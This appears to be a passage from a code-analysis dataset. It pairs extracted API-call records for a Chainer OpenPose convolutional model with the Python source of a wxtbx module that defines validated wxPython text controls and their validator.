'(in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)\n', (2716, 2777), True, 'import chainer.links as L\n'), ((2829, 2905), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)\n', (2844, 2905), True, 'import chainer.links as L\n'), ((2957, 3033), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)\n', (2972, 3033), True, 'import chainer.links as L\n'), ((3085, 3161), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(512)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=512, ksize=1, stride=1, pad=0)\n', (3100, 3161), True, 'import chainer.links as L\n'), ((3213, 3288), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(512)', 'out_channels': '(38)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=512, out_channels=38, ksize=1, stride=1, pad=0)\n', (3228, 3288), True, 'import chainer.links as L\n'), ((3340, 3416), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)\n', (3355, 3416), True, 'import chainer.links as L\n'), ((3468, 3544), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)\n', (3483, 3544), True, 'import chainer.links as L\n'), ((3596, 3672), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)\n', (3611, 3672), True, 'import chainer.links as L\n'), ((3724, 3800), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(512)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=512, ksize=1, stride=1, pad=0)\n', (3739, 3800), True, 'import chainer.links as L\n'), ((3852, 3927), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(512)', 'out_channels': '(19)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=512, out_channels=19, ksize=1, stride=1, pad=0)\n', (3867, 3927), True, 'import chainer.links as L\n'), ((4003, 4079), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (4018, 4079), True, 'import chainer.links as L\n'), ((4133, 4209), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (4148, 4209), True, 'import chainer.links as L\n'), ((4263, 4339), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (4278, 4339), True, 'import chainer.links as L\n'), ((4393, 4469), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (4408, 4469), True, 'import chainer.links as L\n'), ((4523, 4599), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (4538, 4599), True, 'import chainer.links as L\n'), ((4653, 4729), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (4668, 4729), True, 'import chainer.links as L\n'), ((4783, 4858), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(38)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)\n', (4798, 4858), True, 'import chainer.links as L\n'), ((4912, 4988), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (4927, 4988), True, 'import chainer.links as L\n'), ((5042, 5118), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (5057, 5118), True, 'import chainer.links as L\n'), ((5172, 5248), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (5187, 5248), True, 'import chainer.links as L\n'), ((5302, 5378), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (5317, 5378), True, 'import chainer.links as L\n'), ((5432, 5508), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (5447, 5508), True, 'import chainer.links as L\n'), ((5562, 5638), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (5577, 5638), True, 'import chainer.links as L\n'), ((5692, 5767), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(19)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)\n', (5707, 5767), True, 'import chainer.links as L\n'), ((5843, 5919), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (5858, 5919), True, 'import chainer.links as L\n'), ((5973, 6049), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (5988, 6049), True, 'import chainer.links as L\n'), ((6103, 6179), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (6118, 6179), True, 'import chainer.links as L\n'), ((6233, 6309), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (6248, 6309), True, 'import chainer.links as L\n'), ((6363, 6439), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (6378, 6439), True, 'import chainer.links as L\n'), ((6493, 6569), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (6508, 6569), True, 'import chainer.links as L\n'), ((6623, 6698), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(38)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)\n', (6638, 6698), True, 'import chainer.links as L\n'), ((6752, 6828), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (6767, 6828), True, 'import chainer.links as L\n'), ((6882, 6958), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (6897, 6958), True, 'import chainer.links as L\n'), ((7012, 7088), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (7027, 7088), True, 'import chainer.links as L\n'), ((7142, 7218), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (7157, 7218), True, 'import chainer.links as L\n'), ((7272, 7348), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (7287, 7348), True, 'import chainer.links as L\n'), ((7402, 7478), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (7417, 7478), True, 'import chainer.links as L\n'), ((7532, 7607), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(19)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)\n', (7547, 7607), True, 'import chainer.links as L\n'), ((7683, 7759), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (7698, 7759), True, 'import chainer.links as L\n'), ((7813, 7889), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (7828, 7889), True, 'import chainer.links as L\n'), ((7943, 8019), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (7958, 8019), True, 'import chainer.links as L\n'), ((8073, 8149), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (8088, 8149), True, 'import chainer.links as L\n'), ((8203, 8279), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (8218, 8279), True, 'import chainer.links as L\n'), ((8333, 8409), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (8348, 8409), True, 'import chainer.links as L\n'), ((8463, 8538), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(38)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)\n', (8478, 8538), True, 'import chainer.links as L\n'), ((8592, 8668), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (8607, 8668), True, 'import chainer.links as L\n'), ((8722, 8798), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (8737, 8798), True, 'import chainer.links as L\n'), ((8852, 8928), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (8867, 8928), True, 'import chainer.links as L\n'), ((8982, 9058), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (8997, 9058), True, 'import chainer.links as L\n'), ((9112, 9188), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (9127, 9188), True, 'import chainer.links as L\n'), ((9242, 9318), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (9257, 9318), True, 'import chainer.links as L\n'), ((9372, 9447), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(19)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)\n', (9387, 9447), True, 'import chainer.links as L\n'), ((9523, 9599), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (9538, 9599), True, 'import chainer.links as L\n'), ((9653, 9729), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (9668, 9729), True, 'import chainer.links as L\n'), ((9783, 9859), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (9798, 9859), True, 'import chainer.links as L\n'), ((9913, 9989), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (9928, 9989), True, 'import chainer.links as L\n'), ((10043, 10119), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (10058, 10119), True, 'import chainer.links as L\n'), ((10173, 10249), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (10188, 10249), True, 'import chainer.links as L\n'), ((10303, 10378), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(38)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)\n', (10318, 10378), True, 'import chainer.links as L\n'), ((10432, 10508), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (10447, 10508), True, 'import chainer.links as L\n'), ((10562, 10638), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (10577, 10638), True, 'import chainer.links as L\n'), ((10692, 10768), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (10707, 10768), True, 'import chainer.links as L\n'), ((10822, 10898), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (10837, 10898), True, 'import chainer.links as L\n'), ((10952, 11028), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (10967, 11028), True, 'import chainer.links as L\n'), ((11082, 11158), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (11097, 11158), True, 'import chainer.links as L\n'), ((11212, 11287), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(19)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)\n', (11227, 11287), True, 'import chainer.links as L\n'), ((11363, 11439), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (11378, 11439), True, 'import chainer.links as L\n'), ((11493, 11569), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (11508, 11569), True, 'import chainer.links as L\n'), ((11623, 11699), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (11638, 11699), True, 'import chainer.links as L\n'), ((11753, 11829), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (11768, 11829), True, 'import chainer.links as L\n'), ((11883, 11959), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (11898, 11959), True, 'import chainer.links as L\n'), ((12013, 12089), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (12028, 12089), True, 'import chainer.links as L\n'), ((12143, 12218), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(38)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)\n', (12158, 12218), True, 'import chainer.links as L\n'), ((12272, 12348), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(185)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)\n', (12287, 12348), True, 'import chainer.links as L\n'), ((12402, 12478), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (12417, 12478), True, 'import chainer.links as L\n'), ((12532, 12608), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (12547, 12608), True, 'import chainer.links as L\n'), ((12662, 12738), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (12677, 12738), True, 'import chainer.links as L\n'), ((12792, 12868), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(7)', 'stride': '(1)', 'pad': '(3)'}), '(in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)\n', (12807, 12868), True, 'import chainer.links as L\n'), ((12922, 12998), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)\n', (12937, 12998), True, 'import chainer.links as L\n'), ((13052, 13127), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(19)', 'ksize': '(1)', 'stride': '(1)', 'pad': '(0)'}), '(in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)\n', (13067, 13127), True, 'import chainer.links as L\n'), ((145, 186), 'pkg_resources.get_distribution', 'pkg_resources.get_distribution', (['"""chainer"""'], {}), "('chainer')\n", (175, 186), False, 'import itertools, pkg_resources, sys\n'), ((13223, 13277), 'chainer.dataset.get_dataset_directory', 'chainer.dataset.get_dataset_directory', (['"""openpose/pose"""'], {}), "('openpose/pose')\n", (13260, 13277), False, 'import chainer\n'), ((13307, 13355), 'os.path.join', 'os.path.join', (['data_dir', 'models[pretrained_model]'], {}), '(data_dir, models[pretrained_model])\n', (13319, 13355), False, 'import os\n'), ((13707, 13753), 'chainer.serializers.load_npz', 'chainer.serializers.load_npz', (['model_path', 'self'], {}), '(model_path, self)\n', (13735, 13753), False, 'import chainer\n'), ((13958, 14010), 'chainer.serializers.load_npz', 'chainer.serializers.load_npz', (['pretrained_model', 'self'], {}), '(pretrained_model, self)\n', (13986, 14010), False, 'import chainer\n'), ((13409, 13436), 'os.path.dirname', 'os.path.dirname', (['model_path'], {}), '(model_path)\n', (13424, 13436), False, 'import os\n'), ((13824, 13856), 'os.path.exists', 'os.path.exists', (['pretrained_model'], {}), '(pretrained_model)\n', (13838, 13856), False, 'import os\n'), ((478, 513), 'pkg_resources.find_distributions', 'pkg_resources.find_distributions', (['_'], {}), '(_)\n', (510, 513), False, 'import itertools, pkg_resources, sys\n')] |
from __future__ import absolute_import, division, print_function
from wxtbx import phil_controls
import wxtbx
from libtbx.utils import Abort, to_unicode, to_str
from libtbx import Auto
import wx
import sys
class ValidatedTextCtrl(wx.TextCtrl, phil_controls.PhilCtrl):
def __init__(self, *args, **kwds):
saved_value = None
if (kwds.get('value', "") != ""):
saved_value = kwds['value']
kwds['value'] = ""
super(ValidatedTextCtrl, self).__init__(*args, **kwds)
font = wx.Font(wxtbx.default_font_size, wx.MODERN, wx.NORMAL, wx.NORMAL)
self.SetFont(font)
style = self.GetWindowStyle()
if (not style & wx.TE_PROCESS_ENTER):
style |= wx.TE_PROCESS_ENTER
self.SetWindowStyle(style)
self.SetValidator(self.CreateValidator())
self.Bind(wx.EVT_TEXT_ENTER, self.OnEnter, self)
self.Bind(wx.EVT_KILL_FOCUS, self.OnFocusLost, self)
if saved_value is not None:
if (type(saved_value) == str):
save_value = to_unicode(saved_value)
self.SetValue(saved_value)
def GetValue(self):
val = wx.TextCtrl.GetValue(self)
if wxtbx.is_unicode_build():
return to_str(val)
else :
assert isinstance(val, str)
return val
def OnEnter(self, evt=None):
#self.Validate()
self.DoSendEvent()
def OnFocusLost(self, event):
self.DoSendEvent()
event.Skip()
def CreateValidator(self):
raise NotImplementedError()
def Validate(self):
# XXX why doesn't self.Validate() work?
if self.GetValidator().Validate(self.GetParent()):
return True
else :
raise Abort()
def FormatValue(self, value):
raise NotImplementedError()
def GetPhilValue(self):
raise NotImplementedError()
def GetStringValue(self):
value = self.GetPhilValue()
if (value is not None) and (value is not Auto):
return self.FormatValue(value)
elif (self.UseAuto()) or (value is Auto):
return Auto
return None
def Enable(self, enable=True):
wx.TextCtrl.Enable(self, enable)
if enable :
self.SetBackgroundColour((255,255,255))
else :
self.SetBackgroundColour((200,200,200))
class TextCtrlValidator(wx.PyValidator):
def __init__(self):
wx.PyValidator.__init__(self)
self.Bind(wx.EVT_TEXT_ENTER, self.OnEnter)
def Clone(self):
return self.__class__()
def TransferToWindow(self):
return True
def TransferFromWindow(self):
return True
def CheckFormat(self, value):
raise NotImplementedError()
def Validate(self, win):
ctrl = self.GetWindow()
try :
value = to_unicode(ctrl.GetValue())
# if isinstance(value, str):
# value = value.decode("utf-8")
if (value == ""):
ctrl.SetBackgroundColour(
wx.SystemSettings_GetColour(wx.SYS_COLOUR_WINDOW))
return True
reformatted = self.CheckFormat(value)
if isinstance(reformatted, str):
reformatted = to_unicode(reformatted)
ctrl.SetValue(reformatted)
ctrl.SetBackgroundColour(
wx.SystemSettings_GetColour(wx.SYS_COLOUR_WINDOW))
#ctrl.SetFocus()
ctrl.Refresh()
return True
except NotImplementedError :
raise
except Exception as e :
ctrl_name = str(ctrl.GetName())
msg = "Inappropriate value given for \"%s\": %s" %(ctrl_name,str(e))
if (type(e).__name__ == "UnicodeEncodeError"):
msg = ("You have entered characters which cannot be converted to "+
"Latin characters in the control '%s'; due to limitations of the "+
"underlying code, only the standard UTF-8 character set is "+
"allowed.") % ctrl_name
wx.MessageBox(caption="Format error", message=msg)
ctrl.SetBackgroundColour("red")
# Don't set focus on Windows since messagebox is modal and thus
# would automatically recapture focus leading to an endless UI loop
if (sys.platform != 'win32'):
ctrl.SetFocus()
ctrl.Refresh()
return False
def OnEnter(self, event):
#self.Validate(None)
ctrl = self.GetWindow()
ctrl.DoSendEvent()
| [
"libtbx.utils.to_unicode",
"libtbx.utils.Abort",
"wx.TextCtrl.Enable",
"wx.TextCtrl.GetValue",
"wx.SystemSettings_GetColour",
"libtbx.utils.to_str",
"wx.MessageBox",
"wxtbx.is_unicode_build",
"wx.Font",
"wx.PyValidator.__init__"
